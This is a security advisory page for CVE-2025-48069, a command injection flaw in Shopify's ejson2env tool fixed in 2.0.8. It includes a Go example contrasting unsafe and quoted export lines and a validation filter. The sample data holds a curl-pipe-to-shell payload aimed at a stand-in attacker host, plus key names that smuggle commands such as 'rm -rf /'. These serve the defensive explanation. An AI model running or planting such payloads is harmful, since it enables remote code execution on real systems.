Command Injection Vulnerability in ejson2env Tool by Shopify
CVE-2025-48069

CVSS 3.1 base score: 6.6 (MEDIUM)

Key Information:

Vendor: Shopify
Status: Vendor
CVE Published: 21 May 2025

What is CVE-2025-48069?

ejson2env, Shopify's companion tool to EJSON, decrypts an EJSON secrets file and prints the secrets as shell `export` statements, which are intended to be consumed by evaluating them in the calling shell (for example `eval "$(ejson2env secrets.ejson)"`). Prior to version 2.0.8 the tool did not sanitize that output: variable names and values were written into the `export` lines verbatim, so a key or value containing shell metacharacters (a `$(...)` command substitution, backticks, a `;` separator, an unbalanced quote) is interpreted as shell syntax rather than data when the output is evaluated. An attacker who can supply or modify an EJSON file that a victim then decrypts with ejson2env can therefore run arbitrary commands in the shell that evaluates the output, with that shell's privileges. This requires the victim to decrypt attacker-influenced secrets, which is why the score carries high attack complexity and high privileges required. Version 2.0.8 adds output sanitization. Users should upgrade to 2.0.8 or later, avoid decrypting EJSON files from untrusted sources, and never pass the tool's output to `eval` without first checking that every line is a plain `export NAME=value` assignment whose value is quoted as literal data.
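The following Go program is an added illustration written for this page; it is not ejson2env's source and does not claim to reproduce the exact sanitization shipped in 2.0.8. It contrasts the unsanitized export line described above with a hardened one (name restricted to a POSIX identifier, value single-quoted), and adds a consumer-side check a caller can run over each output line before handing it to `eval`. The secret names and values are constructed sample data, and the function names are the author's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample secrets, standing in for what ejson2env sees after decrypting
// an EJSON file. The API_TOKEN value is an attacker-supplied payload: inside
// eval "$(...)" it would be executed, not assigned.
var sampleSecrets = map[string]string{
	"DATABASE_URL": "postgres://app:s3cret@db.internal:5432/app",
	"API_TOKEN":    "$(curl -s http://attacker.example/x | sh)",
}

// identRe is the set of names a POSIX shell accepts for a variable.
var identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// exportLineUnsafe mirrors the pre-2.0.8 behaviour described in the advisory:
// name and value are interpolated verbatim, so shell metacharacters survive
// into the line that the caller evaluates. Illustrative only.
func exportLineUnsafe(name, value string) string {
	return fmt.Sprintf("export %s=%s", name, value)
}

// shellQuote wraps s in single quotes. The only character that needs special
// handling inside single quotes is the single quote itself, which is written
// as '\'' (close quote, escaped quote, reopen quote).
func shellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// exportLineSafe refuses names that are not shell identifiers (a name such as
// "X; rm -rf /" would otherwise smuggle a command) and quotes the value so the
// shell treats it as literal data.
func exportLineSafe(name, value string) (string, error) {
	if !identRe.MatchString(name) {
		return "", fmt.Errorf("refusing to export %q: not a valid shell identifier", name)
	}
	return "export " + name + "=" + shellQuote(value), nil
}

// exportLineRe is the shape a consumer should demand of every line before
// evaluating the tool's output: an identifier and a single-quoted value in
// which the only quote sequence allowed is the '\'' escape.
var exportLineRe = regexp.MustCompile(`^export [A-Za-z_][A-Za-z0-9_]*='(?:[^']|'\\'')*'$`)

// isSafeExportLine is the consumer-side filter: true only for lines that
// cannot do anything but assign a variable when evaluated.
func isSafeExportLine(line string) bool {
	return exportLineRe.MatchString(line)
}

func main() {
	for name, value := range sampleSecrets {
		unsafe := exportLineUnsafe(name, value)
		fmt.Printf("unsafe: %s  (passes consumer check: %v)\n", unsafe, isSafeExportLine(unsafe))
		safe, err := exportLineSafe(name, value)
		if err != nil {
			fmt.Println("safe:   error:", err)
			continue
		}
		fmt.Printf("safe:   %s  (passes consumer check: %v)\n", safe, isSafeExportLine(safe))
	}
	// A hostile key name is rejected outright rather than quoted.
	if _, err := exportLineSafe("PATH; id", "x"); err != nil {
		fmt.Println("hostile name:", err)
	}
}
```

The hardened line `export API_TOKEN='$(curl -s http://attacker.example/x | sh)'` assigns the payload as a string, which is the behaviour the advisory's "sanitization" is meant to achieve; the consumer check rejects the unquoted form even if an old ejson2env is still on the path.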

Affected Version(s)

ejson2env < 2.0.8

CVSS v3.1

Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
Score: 6.6
Severity: MEDIUM
Attack Vector: Network
Attack Complexity: High
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Timeline

  • Vulnerability reserved

  • Vulnerability published: 21 May 2025